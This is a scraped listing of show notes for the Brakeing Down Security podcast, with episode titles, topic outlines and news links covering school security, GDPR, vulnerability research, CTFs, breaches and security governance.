https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/
https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/
Security persons at education institutions of varying sizes.
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Why are schools soft targets? Is money/budget the reason schools get the raw deal here? Why is ransomware such an appealing attack?
How complex is the school environment?
Adding technology too quickly? Outpacing the infrastructure in schools?
Just ideas for some questions. - Jared
Do you find vendors are very responsive in the education space when receiving a vulnerability report?
Is the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud based, or do you still have an IT shack at the school systems with physical machines?
Localadmins are not granted… (excellent!)
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 29 Aug 2017 | 2017-030-Vulnerability OSINT, derbycon CTF walkthrough, and bsides Wellington! | 00:52:37 | |||||||||||||||||||||||||||||||
This week, we discuss the lack of information and where you might find more information about certain vulnerabilities. Seems like many companies fail to give out necessary and actionable information without paying an arm and a leg. We also go over our DerbyCon CTF walkthrough, and discuss the steps to solve it.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-030-vulnerability_OSINT-derbycon_CTF_walkthrough.mp3
Ms. Berlin is going to be at Bsides Wellington! Get your Tickets NOW!
RSS: http://www.brakeingsecurity.com/rss Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw #iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2 #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team #iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/ #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ --show notes--
NCC group talks in Seattle NIST guidelines - no security questions, no SMS based 2fa
Vuln OSINT
Sites have information like Spokeo… Breadcrumbs
Take Java for example (CVE-2017-10102): info is sparse Other sites have more https://tools.cisco.com/security/center/viewAlert.x?alertId=54521 - worse than Oracle’s site (impressive crappery) Some are better: RHEL is fairly decent https://access.redhat.com/errata/RHSA-2017:2424 Ubuntu has some different tidbits https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-10102.html Arch has info https://security.archlinux.org/CVE-2017-10102 Point is, just because you use a specific OS, don’t limit yourself… other OSes may contain more technical info. Some maintainers like to dig, like you.
https://vuldb.com/ - gives value of finding such a PoC for a vuln (5-25K USD for 2017-10102)
Derbycon CTF walkthrough
Looking for an instructor for an ‘intro to RE’ course. Dr. Pulaski = Diana Maldaur Dr. Crusher = Gates McFadden
| |||||||||||||||||||||||||||||||||
| 04 Sep 2017 | 2017-031-Robert_Sell-Defcon_SE_CTF-OSINT_source | 01:03:47 | |||||||||||||||||||||||||||||||
This week, we met up with Robert Sell to discuss competing in the DefCon Social Engineering CTF. You're gonna learn how he prepared for the competition, and learn about some of the tactics you could use to compete in future SE CTF events. Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-031-Robert_Sell-Defcon-SE-CTF.mp3
RSS: http://www.brakeingsecurity.com/rss Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw #iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2 #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team #iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/ #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ | |||||||||||||||||||||||||||||||||
| 29 Apr 2020 | 2020-016-Cameron Smith, Business decisions and their (in)secure outcomes - Part 1 | 00:49:20 | |||||||||||||||||||||||||||||||
Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/) https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final
CMMC:https://info.summit7systems.com/blog/cmmc https://www.comptia.org/certifications/project - Project+ Cameron’s Smith = www.twitter.com/secnomancer Cybersmith.com - Up by 14 April
https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805 https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation
https://www.autopsy.com/support/training/covid-19-free-autopsy-training/ https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ
“There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self.”― Ernest Hemingway https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellowOriginal B-Sides Talk Blurb SITREP: A Consultant's Perspective from the Trenches of InfoSec In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better. Speaking GoalAfter my presentation is over, I want my audience to...
...so that ...
Intro
Security really isn't as complicated as most people think
Establish Credibility
Very Large Company Examples
Government Examples
Small Company Examples
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 26 Apr 2022 | news, farmers affected by ransomware, protestware for the 3rd time, trusting opensource | 00:51:40 | |||||||||||||||||||||||||||||||
https://www.cyberscoop.com/dhs-bug-bounty-122-vulnerabilities-27-critical-hackers/ https://securityaffairs.co/wordpress/130564/hacking/atlassian-jira-authentication-bypass-issue.html https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html https://www.coalfire.com/the-coalfire-blog/research-reveals-cyber-risk-is-the-best-language https://www.cnet.com/tech/mobile/verizon-wireless-customers-report-outages-across-us/ https://www.infosecurity-magazine.com/news/fbi-warns-us-farmers-of-ransomware/ https://securityaffairs.co/wordpress/130497/security/cyber-insurance-global-riskenvironment.html https://securityaffairs.co/wordpress/130443/hacking/cisco-umbrella-default-ssh-key.html https://www.helpnetsecurity.com/2022/04/19/open-source-usage-trends/ https://gizmodo.com/cia-nsa-spies-tracked-anomaly-6-product-demo-1848830150 https://www.infosecurity-magazine.com/news/hackers-gain-admin-rights-with/ https://scottbarrykaufman.com/podcast/ Discord invite (must read and heed the Code of Conduct before admittance to the Discord. Twitch stream: https://twitch.tv/brakesec
| |||||||||||||||||||||||||||||||||
| 14 Jul 2022 | PYPI enables 2FA, some devs have a problem with this | 00:56:22 | |||||||||||||||||||||||||||||||
Full #twitch VOD here (prime sub or paid sub required): https://www.twitch.tv/videos/1528342722
https://thehackernews.com/2022/07/pypi-repository-makes-2af-security.html Twitch streams (175+ hours of content!): Twitter: @infosystir @boettcherpwned @brakesec @bryanbrake | |||||||||||||||||||||||||||||||||
| 07 Nov 2022 | JAMBOREE - an Android App testing platform from @operat0r -part2 | 01:04:15 | |||||||||||||||||||||||||||||||
introducing @operat0r talked a bit about mobile device hacking and rooting/jailbreaking phones for testing Grab the powershell script here: https://github.com/freeload101/Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy
Check out the Youtube videos, including demo! Part2 is here: https://www.youtube.com/watch?v=RXgwUWpRuYA | |||||||||||||||||||||||||||||||||
| 22 Oct 2018 | 2018-037-iWatch save man's life, Alexa detects your mood, and post-derby discussion | 00:44:31 | |||||||||||||||||||||||||||||||
Health & Tech?
https://hackaday.io/project/151388-minder (774 results for “health” on hackaday)
(def don’t need to talk about, but still funny AF) https://hackaday.io/project/11407-myflow
https://9to5mac.com/2017/12/15/apple-watch-saves-life-managing-heart-attack/
Privacy implications? Microsoft healthcare initiative - https://enterprise.microsoft.com/en-us/industries/health/ Apple health - https://www.apple.com/ios/health/ - https://www.apple.com/researchkit/ https://www.papercall.io/dachfest18 Make plans for next year! Follow @derbycon on Twitter! Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 29 Sep 2021 | 2021-035-GRC selection discussion, TechSecChix, and the 'job description problem' | 01:06:57 | |||||||||||||||||||||||||||||||
GRC tools (Governance Risk and Compliance)
@ki_twyce_
@TechSecChix
INfosec unplugged
Security Happy Hour
Eric’s cyberpoppa show
Cyber Insight show - cohost
Blumira is hiring https://www.blumira.com/careers/
https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html
https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/
Why do we need a GRC tool? https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register
What are our business goals? (to make money... :D ) Are we mature enough to be measuring ourselves? How can we use this to be more efficient?
https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/
GRC tool use in other areas
IT - makes more informed budget decisions, determines directions in business goals, asset mgmt Finance - Make better financial decisions, profitability Infosec- vuln mgmt, Compliance HR - determine hiring requirements Legal - ensures ethical management of the organization, reduces breach,
How do you implement GRC? https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation
| |||||||||||||||||||||||||||||||||
| 16 Jun 2022 | jon-dimaggio-part2-threat intel-hacking back-analyzing malware | 00:37:07 | |||||||||||||||||||||||||||||||
Author of the #noStarch book "The Art of Cyberwarfare" (https://nostarch.com/art-cyberwarfare) www.infoseccampout.com for more information about our 2022 conference in Seattle, WA on 26-28 August 2022! Our full 90 minute stream with Jon, including 30 minutes of audio you won't get on the audio podcast is available at the $5 USD Patreon level, or via our VOD at our Twitch Broadcast site (https://twitch.tv/brakesec) Thank you to our Patreon and Twitch supporters for their generous donations and subs and bits! | |||||||||||||||||||||||||||||||||
| 17 Dec 2015 | 2015-052: Wim Remes-ISC2 board member | 00:46:52 | |||||||||||||||||||||||||||||||
I got a hold of Mr. Wim Remes, because he was elected to the ISC board in November 2015. Recent changes to the CISSP included changing the long-standing 10 domains down to 8 domains, plus a major revamp to all of them. I wanted to know what Mr. Remes' plans were for the coming term, how the board works, and how organizations like ISC2 drive change in the industry. I also asked Wim how he is trying to ensure that CISSP and the other certs are going to remain current and competitive. This is a great interview if you're looking to get your #CISSP or any other ISC2 cert, or you currently have an #ISC2 #certification and want to get knowledge of the workings of ISC2 and the board.
Mr. #Remes' Twitter: @wimremes ISC2 official site: http://www.isc2.org
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-052-wim_remes-isc2.mp3 iTunes: https://itunes.apple.com/us/podcast/2015-052-wim-remes-isc2-board/id799131292?i=359103338&mt=2 TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ BrakeSec Podcast Twitter: http://www.twitter.com/brakesec Join our Patreon!: https://www.patreon.com/bds_podcast Comments, Questions, Feedback: bds.podcast@gmail.com | |||||||||||||||||||||||||||||||||
| 28 Mar 2015 | 2015-014-SANS Top 20 Controls - #12 and #13 | 00:57:33 | |||||||||||||||||||||||||||||||
We continue our trek down the list of SANS Top 20 Critical Security Controls this week with #12 and #13 - Boundry Defense, and Controlled use of Administrative Privileges. Learn what you can do to shore up your network defenses, and how to handle admin privileges... When to give that kind of access, and how to make privileged access as secure as possible while still allowing administrators to do their work.
https://www.sans.org/media/critical-security-controls/CSC-5.pdf
http://www.openspf.org/
https://4sysops.com/ | |||||||||||||||||||||||||||||||||
| 21 Jul 2023 | meeting new people, walking on your keyboard causes issues, even google gets phone numbers wrong. | 01:20:11 | |||||||||||||||||||||||||||||||
Check out our sponsor (BLUMIRA) at https://blumira.com/brake youtube channel link: https://youtube.com/c/BDSPodcast Full video on our youtube Channel! https://www.youtube.com/watch?v=BkBeLuM_urk https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
https://therecord.media/cisa-warnings-adobe-microsoft-citrix-vulnerabilities https://therecord.media/airline-customer-support-phone-number-fraud-google https://twitter.com/Shmuli/status/1680669938468499458 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884 https://www.jdsupra.com/legalnews/tabletop-exercises-as-risk-mitigation-5278057/ https://bevyengine.org/ - Rust game engine https://flappybird.io/ - which I suck at, BTW Intro/outro music:
| |||||||||||||||||||||||||||||||||
| 22 Jul 2017 | 2017-025-How will GDPR affect your Biz with Wendyck, and DerbyCon CTF info | 01:10:49 | |||||||||||||||||||||||||||||||
Direct Link:http://traffic.libsyn.com/brakeingsecurity/2017-025-How-GDPR-affects-US-Biz-with-Wendyck-Derbycon2017-CTF-info.mp3
GDPR (General Data Protection Regulation) is weighing on the minds and pocketbooks of a lot of European companies, but is the US as worried? If you read many of the news articles out there, it ranges from 'meh' to 'OMG, the sky, it is falling". GDPR will cause a lot of new issues in the way business is being done, not just in the realm of security, but in the way data is managed, maintained, catalogued, and shared. This week we invited Ms. Wendy Everette Knox (@wendyck) to come in and discuss some of the issues that might hit companies. We also discuss how GDPR and the exit (or not) of the UK from the #European #Union will affect data holders and citizens of the UK. If your company is preparing for the #GDPR mandate, check out the show notes for a lot of good info. ALSO, If you are looking for a ticket to #derbycon 2017, you need to listen to this show, because it has all the info you need to get started. The info is also in the show notes, including the form you need to post your flag information. #RSS: www.brakeingsecurity.com/rss Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw #iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2 #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team #iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/ #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---Show Notes:----
The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679) is a regulation by which the European Parliament, the Council of the European Union and the European Commission intend to strengthen and unify data protection for all individuals within the European Union (EU). It also addresses the export of personal data outside the EU. The primary objectives of the GDPR are to give control back to citizens and residents over their personal data and to simplify the regulatory environment for international business by unifying the regulation within the EU.[1]
Would it be better if companies stored less data, or de-anon it to the point where a breach
Massive fines for breaches. Usually some percentage of profits…
(up to 4% of annual global turnover or €20 Million (whichever is greater))
“Under the GDPR, the Data Controller will be under a legal obligation to notify the Supervisory Authority without undue delay. The reporting of a data breach is not subject to any de minimis standard and must be reported to the Supervisory Authority within 72 hours of the data breach (Article 33).”
Is 72 hours for notification realistic? For massive breaches, 72 hours is just enough time to contain
Right to be forgotten (not realistic): “A right to be forgotten was replaced by a more limited right to erasure in the version of the GDPR adopted by the European Parliament in March 2014.[19][20] Article 17 provides that the data subject has the right to request erasure of personal data related to them on any one of a number of grounds including non-compliance with article 6.1 (lawfulness) that includes a case (f) where the legitimate interests of the controller is overridden by the interests or fundamental rights and freedoms of the data subject which require protection of personal data “
GDPR full text: http://ec.europa.eu/newsroom/document.cfm?doc_id=45631
Good intro:
Controversial topics: http://www.eugdpr.org/controversial-topics.html
Key Changes: http://www.eugdpr.org/key-changes.html
Difficulty of doing GDPR in the cloud https://hackernoon.com/why-gdpr-compliance-is-difficult-in-the-cloud-9755867a3662 US businesses largely ignoring GDPR http://www.informationsecuritybuzz.com/expert-comments/us-businesses-ignoring-gdpr/#infosec
Fears of breach cover-up (due to massive fines ‘up to 4% of profits’) http://tech.newstatesman.com/news/gdpr-cover-ups-security
From the UK ICO, 12 steps to take now to prepare for GDPR https://ico.org.uk/media/for-organisations/documents/1624219/preparing-for-the-gdpr-12-steps.pdf (has a nice infographic on p. 2)
CTF for derby ticket Level 1- The internet is a big place :) I’ve hidden 3 flags out on it and it’s your job to see how many you can find. I’ll give you a few hints to start.
| |||||||||||||||||||||||||||||||||
| 30 Sep 2015 | Derbycon - A podcast with Podcasters! *explicit* | ||||||||||||||||||||||||||||||||
Mr. Boettcher and I attended Derbycon, and while he was out attending talks, I got invited to do a podcast with some of the other podcasts who were there. Special thanks to Edgar Rojas, Amanda Berlin, Jerry Bell, Andrew Kalat, Paul Coggin, Tim DeBlock, and everyone else at our recording. We have a bit more audio that we will post this month, including a discussion of a tool Mr. Boettcher and Michael Gough collaborated on to make windows malware analysis easier to do. | |||||||||||||||||||||||||||||||||
| 28 Jul 2021 | 2021-026-Triaging threat research, Jira vulns, Serious Sam vuln, Systemd vulns, and HiveNightmare | 00:56:38 | |||||||||||||||||||||||||||||||
https://www.mindtools.com/pages/article/newHTE_95.htm https://www.infoq.com/news/2021/07/microsoft-linux-builder-mariner/ https://www.productplan.com/glossary/action-priority-matrix/
More PrintNightmare issues: “"After installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of RFC 4556 spec might fail to print when using smart card (PIV) authentication," Microsoft explained.”
https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/ “Shlayer, discovered in 2018, is constantly maintained and also evolving. The graph below is representative of Shlayer continually being a go-to piece of malware that attackers use to compromise the victim’s machine. We observed an uptick in Shlayer detections occurring before the release of CVE-2021-30657 (the Gatekeeper bypass) that was being exploited by Shlayer. This vulnerability was subsequently patched on April 26, 2021.”
https://www.zdnet.com/article/nasty-linux-systemd-security-bug-revealed/ https://access.redhat.com/security/cve/cve-2021-33910
“It works by enabling attackers to misuse the alloca() function in a way that would result in memory corruption. This, in turn, allows a hacker to crash systemd and hence the entire operating system. Practically speaking, this can be done by a local attacker mounting a filesystem on a very long path. This causes too much memory space to be used in the systemd stack, which results in a system crash.” https://redmondmag.com/articles/2021/07/21/serioussam-windows-flaw.aspx https://securityaffairs.co/wordpress/120576/security/apple-cve-2021-30807-zero-day.html? https://github.com/GossiTheDog/HiveNightmare Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 14 Jul 2019 | 2019-027-GDPR fines for British Airways, FTC fines Facebook, Zooma-palooza | 00:43:23 | |||||||||||||||||||||||||||||||
MITRE Pre-Attack techniques https://attack.mitre.org/techniques/pre/ https://www.bbc.com/news/business-48905907 Zoom - https://www.wired.com/story/zoom-flaw-web-server-fix/
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
| |||||||||||||||||||||||||||||||||
| 17 Dec 2020 | 2020-046-solarwinds-fireeye-breaches-GE-medical-device-issues-and-2021_predictions | 00:52:02 | |||||||||||||||||||||||||||||||
End of year podcast
Blumeria sponsorship
NEWS:
IT company SolarWinds says it may have been hit in 'highly sophisticated' hack | Reuters
FireEye hacked: US cybersecurity firm FireEye hit by 'state-sponsored' attack - BBC News
https://krypt3ia.wordpress.com/ - 16 december 2020
Microsoft flexing muscle to shutdown c2: Microsoft unleashes ‘Death Star’ on SolarWinds hackers in extraordinary response to breach - GeekWire
Little-known SolarWinds gets scrutiny over hack, stock sales (apnews.com)
FireEye, GoDaddy,and Microsoft create kill switch for SolarWinds backdoorSecurity Affairs
US Gov has hacked: US government agencies hacked; Russia a possible culprit (apnews.com)
Not mentioned during the podcast: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor | FireEye Inc
Not trying to spread FUD, but would infiltration by using FOSS tools be easier than Solarwinds?
Time to remove Nano Adblocker and Defender from your browsers (except Firefox) - gHacks Tech News
System oriented programming - Cloud-Sliver (cloud-sliver.com)
G’bye Flash… Adobe releases final Flash Player update, warns of 2021 kill switch (bleepingcomputer.com) IT workers worried about AI making them obsolete… IT Workers Fear Becoming Obsolete in Cyber Roles - Infosecurity Magazine (infosecurity-magazine.com)
Qbot malware switched to stealthy new Windows autostart method (bleepingcomputer.com)
https://www.atlasobscura.com/places/encryption-lava-lamps - “The randomness of this wall of lava lamps helps encrypt up to 10 percent of the internet. “
It’s been the year of the business continuity program this year… and how agile yours is. --thoughts?
Future? Bryan: Companies that are ‘all in’ on remote work will back track. Amanda: I think we’ll see way more keep the wfh now that they realize it saves $$
heck out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 02 Feb 2024 | AccidentalCISO on BrakeSecEd, talking Leadership, SaaS development, and Appsec | 00:29:35 | |||||||||||||||||||||||||||||||
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time based on new information, and do not represent views of past, present, or future employers.
Recorded: 28 Jan 2024 Youtube VOD: https://youtube.com/live/uX7odQTBkyQ
Questions and topics:
Additional information / pertinent LInks (Would you like to know more?):
Show points of Contact: Amanda Berlin: @infosystir @hackershealth Brian Boettcher: @boettcherpwned Bryan Brake: https://linkedin.com/in/brakeb Brakesec Website: https://www.brakeingsecurity.com Youtube channel: https://youtube.com/@brakeseced Twitch Channel: https://twitch.tv/brakesec | |||||||||||||||||||||||||||||||||
| 19 Sep 2022 | Uber Breach, MFA fatigue, who can help communicate biz risk? | 01:09:10 | |||||||||||||||||||||||||||||||
https://www.theverge.com/2022/9/16/23356213/uber-hack-teen-slack-google-cloud-credentials-powershell https://www.zdnet.com/article/uber-security-breach-looks-bad-potentially-compromising-all-systems/ https://twitter.com/RachelTobac/status/1571542949606957057
Twitter: @infosystir @brakeSec @bryanbrake Twitch: https://twitch.tv/brakesec
| |||||||||||||||||||||||||||||||||
| 19 Nov 2018 | 2018-040- Jarrod Frates discusses pentest processes | 01:21:18 | |||||||||||||||||||||||||||||||
Jarrod Frates Inguardians @jarrodfrates “Skittering Through Networks” Ms. Berlin in Germany - How’d it go?
TinkerSec’s story: https://threadreaderapp.com/thread/1063423110513418240.html
Takeaways Blue Team: - Least Privilege Model - Least Access Model “limited remote access to only a small number of IT personnel” “This user didn't need Citrix, so her Citrix linked to NOTHING” “They limited access EVEN TO LOCAL ADMINS!” - Multi-Factor Authentication - Simple Anomaly Rule Fires “Finance doesn’t use Powershell” - Defense in Depth “moving from passwords to pass phrases…” “Improper disposal of information assets”
Red Team: - Keep Trying - Never Assume - Bring In Help - Luck Favors the Prepared - Adapt and Overcome
Before the Test
During the Test
After the Test
Ms. Berlin’s Legit business - Mental Health Hackers
CFP for Bsides Seattle (Deadline: 26 November 2018) http://www.securitybsides.com/w/page/129078930/BsidesSeattle2019
CFP for BsidesNash https://twitter.com/bsidesnash/status/1063084215749787649 Closes Dec 31
Teaching a class in Seattle for SANS (SEC504) - need some students! Reach out to me for more information. Looking to do this at the end of February through March
